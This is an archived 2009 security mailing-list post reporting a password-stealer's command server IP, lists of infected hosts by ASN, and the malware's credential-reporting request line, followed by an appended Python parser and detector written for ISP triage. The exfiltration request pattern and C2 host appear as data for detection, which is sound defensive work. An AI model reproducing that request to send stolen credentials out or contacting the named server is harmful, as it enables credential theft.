[nsp-sec] 130K+ Infected Ips on ~3600 ASNs
Philip Taylor
Philip.Taylor at rci.rogers.com
Thu Oct 1 15:09:10 EDT 2009
ACK AS812, AS3602
Thanks
-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Thursday, October 01, 2009 1:48 PM
To: NSP-SEC List
Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs
----------- nsp-security Confidential --------
Hi Team,
This password stealer head end IP appears to be quite busy:
76.73.37.250
We're working w/ the ISP on takedown, however in the meantime here is a
list of 130K+ infected IPs seen talking to it primarily via TCP 80
(reporting stolen credentials) and UDP 7006 - UDP 7012. I don't
anticipate an IP takedown to last forever because they can likely
re-route via DNS.
ASN list:
https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
Infected IP list:
https://www.cymru.com/nsp-sec/Owned/stealer/
eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
Timestamps in UTC.
Some clarification on the formatting:
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
The timestamp column will begin with a U or a T. U is for UDP, T for
TCP. When possible we've preferred to list out a T if we have seen any
TCP 80 traffic from the client IP in question.
It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data
will not match in all cases. I cannot guarantee that the UDP traffic is
not part of some type of actual software but it sure looks suspicious.
Here is a public URL for reference:
http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
As there is UDP involved we cannot guarantee that there are 0 spoofed
IPs, but on the TCP side that is another matter.
HTTP credential stealing looks something like this:
GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.
Cheers,
-- steve
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security community. Confidentiality is essential for effective
Internet security counter-measures.
_______________________________________________
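Two parts of the quoted report lend themselves to code on the receiving ISP's side: the `ASN | IP | U/T timestamp | AS name` list format, and the `/pp2/?s=...&u=...&p=...` request pattern that a proxy or IDS log could be checked against. The Python below is an added example written for this archive page; it is not Team Cymru's tooling and did not appear in the thread. The MIT list line is the post's own; the other list lines, the ASN set (812 and 3602, the two ACKed above) and the request lines are constructed. The split of UDP records with RFC 1918 sources into their own bucket follows the post's caveat that the UDP data may not match the real client in all cases.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the format the post describes:
#   ASN | IP | U-or-T timestamp (UTC) | AS name
# The first line is the post's own example; the rest use RFC 5737
# documentation addresses and are constructed for this example.
SAMPLE_LIST = """\
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
812 | 192.0.2.17 | T 2009/10/01 04:02:11.000000 | EXAMPLE-AS-812 (constructed)
812 | 192.0.2.44 | U 2009/10/01 04:05:30.250000 | EXAMPLE-AS-812 (constructed)
3602 | 198.51.100.9 | T 2009/10/01 05:17:45.777777 | EXAMPLE-AS-3602 (constructed)
3602 | 10.1.2.3 | U 2009/10/01 05:18:00.000000 | EXAMPLE-AS-3602 (constructed)
"""


@dataclass(frozen=True)
class Sighting:
    asn: int
    ip: str
    proto: str          # "U" = seen on UDP 7006-7012, "T" = seen on TCP 80
    seen_utc: datetime
    as_name: str


LINE_RE = re.compile(
    r"^\s*(?P<asn>\d+)\s*\|\s*(?P<ip>[0-9.]+)\s*\|\s*"
    r"(?P<proto>[UT])\s+(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?)"
    r"\s*\|\s*(?P<name>.*?)\s*$"
)


def parse_sightings(text: str) -> List[Sighting]:
    """Parse the pipe-delimited list; the post says timestamps are UTC."""
    out: List[Sighting] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable line: {line!r}")
        fmt = "%Y/%m/%d %H:%M:%S" + (".%f" if "." in m["ts"] else "")
        ts = datetime.strptime(m["ts"], fmt).replace(tzinfo=timezone.utc)
        out.append(Sighting(int(m["asn"]), m["ip"], m["proto"], ts, m["name"]))
    return out


# RFC 1918 only (not ipaddress.is_private, which also covers the
# documentation ranges used in the constructed sample above).
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in RFC1918)


def triage(sightings: List[Sighting], my_asns: set) -> Dict[str, List[str]]:
    """Bucket our own ASNs' records by how much the post lets us trust them:
    T records came over TCP 80 (no spoofing concern raised); U records are
    UDP and may be spoofed; U records with an RFC 1918 source cannot be
    mapped to a customer at all and only show the malware picks its own
    source address."""
    buckets: Dict[str, List[str]] = {
        "tcp_confirmed": [], "udp_unverified": [], "udp_rfc1918": []}
    for s in sightings:
        if s.asn not in my_asns:
            continue
        if s.proto == "T":
            buckets["tcp_confirmed"].append(s.ip)
        elif is_rfc1918(s.ip):
            buckets["udp_rfc1918"].append(s.ip)
        else:
            buckets["udp_unverified"].append(s.ip)
    return buckets


# Request-line shape from the post's capture: GET /pp2/?s=<url>&u=<user>&p=<pass>
EXFIL_RE = re.compile(r"^GET /pp2/\?(?P<qs>\S+) HTTP/1\.[01]\s*$")


def parse_exfil_request(request_line: str) -> Optional[dict]:
    """Return which site's credential was reported and for which user, or
    None if the line is not the /pp2/ pattern. The password value itself is
    never returned; only its presence is recorded, so the output is safe to
    put in a ticket or customer notification."""
    m = EXFIL_RE.match(request_line.strip())
    if not m:
        return None
    qs = parse_qs(m["qs"], keep_blank_values=True)   # also percent-decodes
    if not {"s", "u", "p"} <= qs.keys():
        return None
    return {
        "site": urlsplit(qs["s"][0]).hostname,
        "user": qs["u"][0],
        "password_present": bool(qs["p"][0]),
    }


if __name__ == "__main__":
    for bucket, ips in triage(parse_sightings(SAMPLE_LIST), {812, 3602}).items():
        print(bucket, ips)
    # Constructed request line in the post's pattern (not a real capture).
    print(parse_exfil_request(
        "GET /pp2/?s=http%3a%2f%2fwww.example.com%2findex.php&u=alice&p=sample-pass HTTP/1.1"))
```

The TCP bucket is the one to act on first; the UDP buckets are worth a second look against local flow data before notifying a customer, since the post itself will not vouch for the UDP source addresses.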